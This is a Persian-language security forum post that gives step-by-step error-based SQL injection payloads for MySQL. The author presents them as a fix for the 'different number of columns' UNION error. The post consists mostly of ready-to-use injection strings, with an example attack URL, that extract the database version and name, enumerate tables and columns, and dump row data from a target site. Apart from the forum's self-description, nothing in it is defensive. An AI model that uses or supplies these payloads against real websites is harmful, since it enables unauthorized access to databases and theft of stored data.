رفتن به مطلب
انجمن تیم امنیتی گارد ایران

بایپس the used SELECT statements have a different number of columns در sqli


ارسال های توصیه شده

سلام دوستان متین نوریان هستم
بعضی وقتا شما تعداد table هارو پیدا میکنین اما وقتا یونیون میزنین ارور The used SELECT statements have a different number of columns میگیرید
اما راه حل چیه؟ من پیلود های زیر رو براتون میزارم استفاده کنید 90 درصصد جواب میده...

 

برای گرفتن  ورژن دیتابیس :
+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+-

مثال :

http://target.com/index.php?id=65'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+-





برای گرفتن نام دیتابیس :

+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -

بعد از اجرای این کوعری ما اروری حاوی نام دیتا بیس خواهیم داشت:

Duplicate entry 'DB-name~1' for key ''


 

حالا میزیم برای گرفتن تیبل ها
اول باید نام دیتابیسو به هگز تبدیل کنید در سیات های انلاین یا هرجا:

DB-name hex = 0x44422d6e616d65

کوعری ما :

+AND(SELECT+1+FROM++AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x44422d6e616d65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -

ارور برگشتی حاوی نام اولین table ماست که اول باید به هگز تبدیلش کنیم
table-nm = 0x
63756c6f6d6e2d6e6d

برای گرفتن دومین table کافیه در کوعری بالا limit 0,1 رو به limit 1,1 تغیر بدید برای table سوم limit 2,1 و بدین صورت ...


حالا میریم برای ستون ها  :
نیاز به تیبل نیم و دیتابیس نیم  هگز شده داریم:

DB-name hex = 0x44422d6e616d65

table-nm = 0x63756c6f6d6e2d6e6d



کوعری ما :

+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x63756c6f6d6e2d6e6d+AND+table_schema=0x44422d6e616d65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
برای گرفتن دومین culomn کافیه در کوعری بالا limit 0,1 رو به limit 1,1 تغیر بدید برای culomn سوم limit 2,1 و بدین صورت ...

 


ارور برگشتی ما حاوی کالمن نیم هست یا نام ستون
culomn-nm

آخرین کوعری برای دامپ کردن :

+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(culomn-nm)+AS+CHAR),0x7e))+FROM+DB-name.table-nm+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
و با تغیر limit مثل بالا میتونید بقیه اطلاعات رو بردارید...
با تشکر
پیج اینستاگرام بنده : @matitanium

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...